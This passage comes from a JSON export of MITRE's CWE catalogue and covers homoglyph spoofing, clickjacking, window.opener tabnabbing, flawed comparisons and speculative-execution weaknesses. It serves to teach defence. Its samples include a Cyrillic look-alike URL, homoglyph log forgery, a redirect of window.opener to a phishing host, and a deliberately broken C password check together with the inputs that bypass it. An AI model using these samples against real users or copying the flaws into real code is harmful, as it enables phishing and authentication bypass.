icons can be semantically distinct to a program, while appearing very similar or identical to a human user. These are referred to as homoglyphs. For example, the lowercase \\"l\\" (ell) and uppercase \\"I\\" (eye) have different character codes, but these characters can be displayed in exactly the same way to a user, depending on the font. This can also occur between different character sets. For example, the Latin capital letter \\"A\\" and the Greek capital letter \\"\u0391\\" (Alpha) are treated as distinct by programs, but may be displayed in exactly the same way to a user. Accent marks may also cause letters to appear very similar, such as the Latin capital letter grave mark \\"\xc0\\" and its equivalent \\"\xc0\\" with the acute accent.","Adversaries can exploit this visual similarity for attacks such as phishing, e.g. by providing a link to an attacker-controlled hostname that looks like a hostname that the victim trusts. In a different use of homoglyphs, an adversary may create a back door username that is visually similar to the username of a regular user, which then makes it more difficult for a system administrator to detect the malicious username while reviewing logs."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"451","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Sometimes"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Homograph Attack","Description":"\\"Homograph\\" is often used as a synonym of \\"homoglyph\\" by researchers, but according to Wikipedia, a homograph is a word that has multiple, distinct meanings."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness may occur when characters from various character sets are allowed to be interchanged within a URL, username, email address, etc. without any notification to the user or underlying system being used."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":"Other","Note":"An attacker may ultimately redirect a user to a malicious website, by deceiving the user into believing the URL they are accessing is a trusted domain. However, the attack can also be used to forge log entries by using homoglyphs in usernames. Homoglyph manipulations are often the first step towards executing advanced attacks such as stealing a user\'s credentials, Cross-Site Scripting (XSS), or log forgery. If an attacker redirects a user to a malicious site, the attacker can mimic a trusted domain to steal account credentials and perform actions on behalf of the user, without the user\'s knowledge. Similarly, an attacker could create a username for a website that contains homoglyph characters, making it difficult for an admin to review logs and determine which users performed which actions."}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Dynamic Analysis","Description":"If utilizing user accounts, attempt to submit a username that contains homoglyphs. Similarly, check to see if links containing homoglyphs can be sent via email, web browsers, or other mechanisms.","Effectiveness":"Moderate"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":{"xhtml:p":["Use a browser that displays Punycode for IDNs in the URL and status bars, or which color code various scripts in URLs.","Due to the prominence of homoglyph attacks, several browsers now help safeguard against this attack via the use of Punycode. For example, Mozilla Firefox and Google Chrome will display IDNs as Punycode if top-level domains do not restrict which characters can be used in domain names or if labels mix scripts for different languages."]}},{"Phase":"Implementation","Description":{"xhtml:p":["Use an email client that has strict filters and prevents messages that mix character sets to end up in a user\'s inbox.","Certain email clients such as Google\'s GMail prevent the use of non-Latin characters in email addresses or in links contained within emails. This helps prevent homoglyph attacks by flagging these emails and redirecting them to a user\'s spam folder."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following looks like a simple, trusted URL that a user may frequently access.","Example_Code":{"attr":{"@_Nature":"attack"},"xhtml:div":"http://www.\u0435x\u0430m\u0440l\u0435.\u0441\u043em"},"Body_Text":"However, the URL above is comprised of Cyrillic characters that look identical to the expected ASCII characters. This results in most users not being able to distinguish between the two and assuming that the above URL is trusted and safe. The \\"e\\" is actually the \\"CYRILLIC SMALL LETTER IE\\" which is represented in HTML as the character &#x0435, while the \\"a\\" is actually the \\"CYRILLIC SMALL LETTER A\\" which is represented in HTML as the character &#x0430. The \\"p\\", \\"c\\", and \\"o\\" are also Cyrillic characters in this example. Viewing the source reveals a URL of \\"http://www.&#x0435;x&#x0430;m&#x0440;l&#x0435;.&#x0441;&#x043e;m\\". An adversary can utilize this approach to perform an attack such as a phishing attack in order to drive traffic to a malicious website."},{"Intro_Text":"The following displays an example of how creating usernames containing homoglyphs can lead to log forgery.","Body_Text":["Assume an adversary visits a legitimate, trusted domain and creates the account \\"admin\\" where the \'a\' and \'i\' characters are Cyrillic characters instead of the expected ACII. Any actions the adversary performs will be saved to the log file and look like they came from a legitimate administrator account.","However, upon closer inspection, the account that generated these log entries is \\"&#x0430;dm&#x0456;n\\". This makes it more difficult to determine which actions were performed by the adversary and which actions were executed by the legitimate \\"admin\\" account."],"Example_Code":{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"123.123.123.123 \u0430dm\u0456n [17/Jul/2017:09:05:49 -0400] \\"GET /example/users/userlist HTTP/1.1\\" 401 12846123.123.123.123 \u0430dm\u0456n [17/Jul/2017:09:06:51 -0400] \\"GET /example/users/userlist HTTP/1.1\\" 200 4523123.123.123.123 \u0430dm\u0456n [17/Jul/2017:09:10:02 -0400] \\"GET /example/users/editusers HTTP/1.1\\" 200 6291123.123.123.123 \u0430dm\u0456n [17/Jul/2017:09:10:02 -0400] \\"GET /example/users/editusers HTTP/1.1\\" 200 6291123.123.123.123 \u0430dm\u0456n [17/Jul/2017:09:10:02 -0400] \\"GET /example/users/editusers HTTP/1.1\\" 200 6291123.123.123.123 \u0430dm\u0456n [17/Jul/2017:09:10:02 -0400] \\"GET /example/users/editusers HTTP/1.1\\" 200 6291","xhtml:br":["","","","",""]}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2013-7236","Description":"web forum allows impersonation of users with homoglyphs in account names","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7236"},{"Reference":"CVE-2012-0584","Description":"Improper character restriction in URLs in web browser","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0584"},{"Reference":"CVE-2009-0652","Description":"Incomplete denylist does not include homoglyphs of \\"/\\" and \\"?\\" characters in URLs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0652"},{"Reference":"CVE-2017-5015","Description":"web browser does not convert hyphens to punycode, allowing IDN spoofing in URLs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5015"},{"Reference":"CVE-2005-0233","Description":"homoglyph spoofing using punycode in URLs and certificates","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0233"},{"Reference":"CVE-2005-0234","Description":"homoglyph spoofing using punycode in URLs and certificates","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0234"},{"Reference":"CVE-2005-0235","Description":"homoglyph spoofing using punycode in URLs and certificates","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0235"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 11, "Canonical Representation Issues", Page 382"}},{"attr":{"@_External_Reference_ID":"REF-8"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2017-07-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Demonstrative_Examples, Description, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Demonstrative_Examples, Description, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples"}]}},"1021":{"attr":{"@_ID":"1021","@_Name":"Improper Restriction of Rendered UI Layers or Frames","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web application does not restrict or incorrectly restricts frame objects or UI layers that belong to another application or domain, which can lead to user confusion about which interface the user is interacting with.","Extended_Description":"A web application is expected to place restrictions on whether it is allowed to be rendered within frames, iframes, objects, embed or applet elements. Without the restrictions, users can be tricked into interacting with the application when they were not intending to.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"441","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"451","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Clickjacking"},{"Term":"UI Redress Attack"},{"Term":"Tapjacking","Description":"\\"Tapjacking\\" is similar to clickjacking, except it is used for mobile applications in which the user \\"taps\\" the application instead of performing a mouse click."}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism","Read Application Data","Modify Application Data"],"Note":"An attacker can trick a user into performing actions that are masked and hidden from the user\'s view. The impact varies widely, depending on the functionality of the underlying application. For example, in a social media application, clickjacking could be used to trik the user into changing privacy settings."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":{"xhtml:p":["The use of X-Frame-Options allows developers of web content to restrict the usage of their application within the form of overlays, frames, or iFrames. The developer can indicate from which domains can frame the content.","The concept of X-Frame-Options is well documented, but implementation of this protection mechanism is in development to cover gaps. There is a need for allowing frames from multiple domains."]}},{"Phase":"Implementation","Description":{"xhtml:p":["A developer can use a \\"frame-breaker\\" script in each page that should not be framed. This is very helpful for legacy browsers that do not support X-Frame-Options security feature previously mentioned.","It is also important to note that this tactic has been circumvented or bypassed. Improper usage of frames can persist in the web application through nested frames. The \\"frame-breaking\\" script does not intuitively account for multiple nested frames that can be presented to the user."]}},{"Phase":"Implementation","Description":"This defense-in-depth technique can be used to prevent the improper usage of frames in web applications. It prioritizes the valid sources of data to be loaded into the application through the usage of declarative policies. Based on which implementation of Content Security Policy is in use, the developer should use the \\"frame-ancestors\\" directive or the \\"frame-src\\" directive to mitigate this weakness. Both directives allow for the placement of restrictions when it comes to allowing embedded content."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2017-7440","Description":"E-mail preview feature in a desktop application allows clickjacking attacks via a crafted e-mail message","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7440"},{"Reference":"CVE-2017-5697","Description":"Hardware/firmware product has insufficient clickjacking protection in its web user interface","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5697"},{"Reference":"CVE-2017-4015","Description":"Clickjacking in data-loss prevention product via HTTP response header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-4015"},{"Reference":"CVE-2016-2496","Description":"Tapjacking in permission dialog for mobile OS allows access of private storage using a partially-overlapping window.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2496"},{"Reference":"CVE-2015-1241","Description":"Tapjacking in web browser related to page navigation and touch/gesture events.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1241"},{"Reference":"CVE-2017-0492","Description":"System UI in mobile OS allows a malicious application to create a UI overlay of the entire screen to gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0492"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"103"}},{"attr":{"@_CAPEC_ID":"181"}},{"attr":{"@_CAPEC_ID":"222"}},{"attr":{"@_CAPEC_ID":"504"}},{"attr":{"@_CAPEC_ID":"506"}},{"attr":{"@_CAPEC_ID":"654"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-35"}},{"attr":{"@_External_Reference_ID":"REF-36"}},{"attr":{"@_External_Reference_ID":"REF-37"}},{"attr":{"@_External_Reference_ID":"REF-38"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2017-08-01"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1022":{"attr":{"@_ID":"1022","@_Name":"Use of Web Link to Untrusted Target with window.opener Access","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web application produces links to untrusted external sites outside of its sphere of control, but it does not properly prevent the external site from modifying security-critical properties of the window.opener object, such as the location property.","Extended_Description":"When a user clicks a link to an external site (\\"target\\"), the target=\\"_blank\\" attribute causes the target site\'s contents to be opened in a new window or tab, which runs in the same process as the original page. The window.opener object records information about the original page that offered the link. If an attacker can run script on the target page, then they could read or modify certain properties of the window.opener object, including the location property - even if the original and target site are not the same origin. An attacker can modify the location property to automatically redirect the user to a malicious site, e.g. as part of a phishing attack. Since this redirect happens in the original window/tab - which is not necessarily visible, since the browser is focusing the display on the new target page - the user might not notice any suspicious redirection.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"266","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"JavaScript","@_Prevalence":"Often"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Often"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"tabnabbing"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness is introduced during the design of an application when the architect does not specify that a linked external document should not be able to alter the location of the calling page."},{"Phase":"Implementation","Note":"This weakness is introduced during the coding of an application when the developer does not include the noopener and/or noreferrer value for the rel attribute."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Alter Execution Logic","Note":"The user may be redirected to an untrusted page that contains undesired content or malicious script code."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Specify in the design that any linked external document must not be granted access to the location object of the calling page."},{"Phase":"Implementation","Description":{"xhtml:p":["When creating a link to an external document using the <a> tag with a defined target, for example \\"_blank\\" or a named frame, provide the rel attribute with a value \\"noopener noreferrer\\".","If opening the external document in a new window via javascript, then reset the opener by setting it equal to null."]}},{"Phase":"Implementation","Description":{"xhtml:p":"Do not use \\"_blank\\" targets. However, this can affect the usability of the application."}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, the application opens a link in a named window/tab without taking precautions to prevent the called page from tampering with the calling page\'s location in the browser.","Body_Text":["There are two ways that this weakness is commonly seen. The first is when the application generates an <a> tag is with target=\\"_blank\\" to point to a target site:","If the attacker offers a useful page on this link (or compromises a trusted, popular site), then a user may click on this link. However, the attacker could use scripting code to modify the window.opener\'s location property to redirect the application to a malicious, attacker-controlled page - such as one that mimics the look and feel of the original application and convinces the user to re-enter authentication credentials, i.e. phishing:","To mitigate this type of weakness, some browsers support the \\"rel\\" attribute with a value of \\"noopener\\", which sets the window.opener object equal to null. Another option is to use the \\"rel\\" attribute with a value of \\"noreferrer\\", which in essence does the same thing.","A second way that this weakness is commonly seen is when opening a new site directly within JavaScript. In this case, a new site is opened using the window.open() function.","To mitigate this, set the window.opener object to null."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"HTML"},"xhtml:div":"<a href=\\"http://attacker-site.example.com/useful-page.html\\" target=\\"_blank\\">"},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":"window.opener.location = \'http://phishing.example.org/popular-bank-page\';"},{"attr":{"@_Nature":"good","@_Language":"HTML"},"xhtml:div":"<a href=\\"http://attacker-site.example.com/useful-page.html\\" target=\\"_blank\\" rel=\\"noopener noreferrer\\">"},{"attr":{"@_Nature":"bad","@_Language":"JavaScript"},"xhtml:div":"var newWindow = window.open(\\"http://attacker-site.example.com/useful-page.html\\", \\"_blank\\");"},{"attr":{"@_Nature":"good","@_Language":"JavaScript"},"xhtml:div":{"#text":"var newWindow = window.open(\\"http://attacker-site.example.com/useful-page.html\\", \\"_blank\\");newWindow.opener = null;","xhtml:br":""}}]}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-39"}},{"attr":{"@_External_Reference_ID":"REF-40"}},{"attr":{"@_External_Reference_ID":"REF-958"}}]},"Content_History":{"Submission":{"Submission_Name":"David Deatherage","Submission_Organization":"Silicon Valley Bank","Submission_Date":"2017-09-26"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Alternate_Terms, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Improper Restriction of Cross-Origin Permission to window.opener.location","attr":{"@_Date":"2018-03-27"}}}},"1023":{"attr":{"@_ID":"1023","@_Name":"Incomplete Comparison with Missing Factors","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs a comparison between entities that must consider multiple factors or characteristics of each entity, but the comparison does not include one or more of these factors.","Extended_Description":"An incomplete comparison can lead to resultant weaknesses, e.g., by operating on the wrong object or making a security decision without considering a required factor.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Access Control"],"Impact":["Alter Execution Logic","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Thoroughly test the comparison scheme before deploying code into production. Perform positive testing as well as negative testing."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-115"},"Intro_Text":"Consider an application in which Truck objects are defined to be the same if they have the same make, the same model, and were manufactured in the same year.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class Truck {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String make;private String model;private int year;public boolean equals(Object o) {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (o == null) return false;if (o == this) return true;if (!(o instanceof Truck)) return false;Truck t = (Truck) o;return (this.make.equals(t.getMake()) && this.model.equals(t.getModel()));","xhtml:br":["","","","","",""]}}}}}},"Body_Text":"Here, the equals() method only checks the make and model of the Truck objects, but the year of manufacture is not included."},{"attr":{"@_Demonstrative_Example_ID":"DX-116"},"Intro_Text":"This example defines a fixed username and password. The AuthenticateUser() function is intended to accept a username and a password from an untrusted user, and check to ensure that it matches the username and password. If the username and password match, AuthenticateUser() is intended to indicate that authentication succeeded.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *username = \\"admin\\";char *pass = \\"password\\";int AuthenticateUser(char *inUser, char *inPass) {}int main (int argc, char **argv) {}","xhtml:i":"/* Ignore CWE-259 (hard-coded password) and CWE-309 (use of password system for authentication) for this example. */","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"if (strncmp(username, inUser, strlen(inUser))) {}if (! strncmp(pass, inPass, strlen(inPass))) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"logEvent(\\"Auth failure of username using strlen of inUser\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logEvent(\\"Auth success of password using strlen of inUser\\");return(AUTH_SUCCESS);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logEvent(\\"Auth fail of password using sizeof\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]},{"#text":"int authResult;if (argc < 3) {}authResult = AuthenticateUser(argv[1], argv[2]);if (authResult == AUTH_SUCCESS) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Usage: Provide a username and password\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAuthenticatedTask(argv[1]);","attr":{"@_style":"margin-left:10px;"}},{"#text":"ExitError(\\"Authentication failed\\");","attr":{"@_style":"margin-left:10px;"}}]}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"ppapaspass","xhtml:br":["","",""]}}],"Body_Text":["In AuthenticateUser(), the strncmp() call uses the string length of an attacker-provided inPass parameter in order to determine how many characters to check in the password. So, if the attacker only provides a password of length 1, the check will only examine the first byte of the application\'s password before determining success.","As a result, this partial comparison leads to improper authentication (CWE-287).","Any of these passwords would still cause authentication to succeed for the \\"admin\\" user:","This significantly reduces the search space for an attacker, making brute force attacks more feasible.","The same problem also applies to the username, so values such as \\"a\\" and \\"adm\\" will succeed for the username.","While this demonstrative example may not seem realistic, see the Observed Examples for CVE entries that effectively reflect this same weakness."]}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-01-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"1024":{"attr":{"@_ID":"1024","@_Name":"Comparison of Incompatible Types","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs a comparison between two entities, but the entities are of different, incompatible types that cannot be guaranteed to provide correct results when they are directly compared.","Extended_Description":"In languages that are strictly typed but support casting/conversion, such as C or C++, the programmer might assume that casting one entity to the same type as another entity will ensure that the comparison will be performed correctly, but this cannot be guaranteed. In languages that are not strictly typed, such as PHP or JavaScript, there may be implicit casting/conversion to a type that the programmer is unaware of, causing unexpected results; for example, the string \\"123\\" might be converted to a number type. See examples.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"JavaScript","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Thoroughly test the comparison scheme before deploying code into production. Perform positive testing as well as negative testing."}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-01-04"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1025":{"attr":{"@_ID":"1025","@_Name":"Comparison Using Wrong Factors","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code performs a comparison between two entities, but the comparison examines the wrong factors or characteristics of the entities, which can lead to incorrect results and resultant weaknesses.","Extended_Description":"This can lead to incorrect results and resultant weaknesses. For example, the code might inadvertently compare references to objects, instead of the relevant contents of those objects, causing two \\"equal\\" objects to be considered unequal.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Thoroughly test the comparison scheme before deploying code into production. Perform positive testing as well as negative testing."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-60"},"Intro_Text":"In the example below, two Java String objects are declared and initialized with the same string values. An if statement is used to determine if the strings are equivalent.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String str1 = new String(\\"Hello\\");String str2 = new String(\\"Hello\\");if (str1 == str2) {}","xhtml:br":["",""],"xhtml:div":{"#text":"System.out.println(\\"str1 == str2\\");","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"if (str1.equals(str2)) {}","xhtml:div":{"#text":"System.out.println(\\"str1 equals str2\\");","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"However, the if statement will not be executed as the strings are compared using the \\"==\\" operator. For Java objects, such as String objects, the \\"==\\" operator compares object references, not object values. While the two String objects above contain the same string values, they refer to different object references, so the System.out.println statement will not be executed. To compare object values, the previous code could be modified to use the equals method:"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-01-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"1037":{"attr":{"@_ID":"1037","@_Name":"Processor Optimization Removal or Modification of Security-critical Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The developer builds a security-critical protection mechanism into the software, but the processor optimizes the execution of the program such that the mechanism is removed or modified.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1038","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary","Description":"This weakness does not depend on other weaknesses and is the result of choices made by the processor in executing the specified application."}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Rarely"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"Optimizations built into the design of the processor can have unintended consequences during the execution of an application."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Bypass Protection Mechanism","Likelihood":"High","Note":"A successful exploitation of this weakness will change the order of an application\'s execution and will likely be used to bypass specific protection mechanisms. This bypass can be exploited further to potentially read data that should otherwise be unaccessible."}},"Detection_Methods":{"Detection_Method":{"Method":"White Box","Description":"In theory this weakness can be detected through the use of white box testing techniques where specifically crafted test cases are used in conjunction with debuggers to verify the order of statements being executed.","Effectiveness":"Opportunistic","Effectiveness_Notes":"Although the mentioned detection method is theoretically possible, the use of speculative execution is a preferred way of increasing processor performance. The reality is that a large number of statements are executed out of order, and determining if any of them break an access control property would be extremely opportunistic."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2017-5715","Description":"Intel, ARM, and AMD processor optimizations related to speculative execution and branch prediction cause access control checks to be bypassed when placing data into the cache. Often known as \\"Spectre\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5715"},{"Reference":"CVE-2017-5753","Description":"Intel, ARM, and AMD processor optimizations related to speculative execution and branch prediction cause access control checks to be bypassed when placing data into the cache. Often known as \\"Spectre\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5753"},{"Reference":"CVE-2017-5754","Description":"Intel processor optimizations related to speculative execution cause access control checks to be bypassed when placing data into the cache. Often known as \\"Meltdown\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5754"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"663"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-11"}},{"attr":{"@_External_Reference_ID":"REF-12"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-03-07"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1038":{"attr":{"@_ID":"1038","@_Name":"Insecure Automated 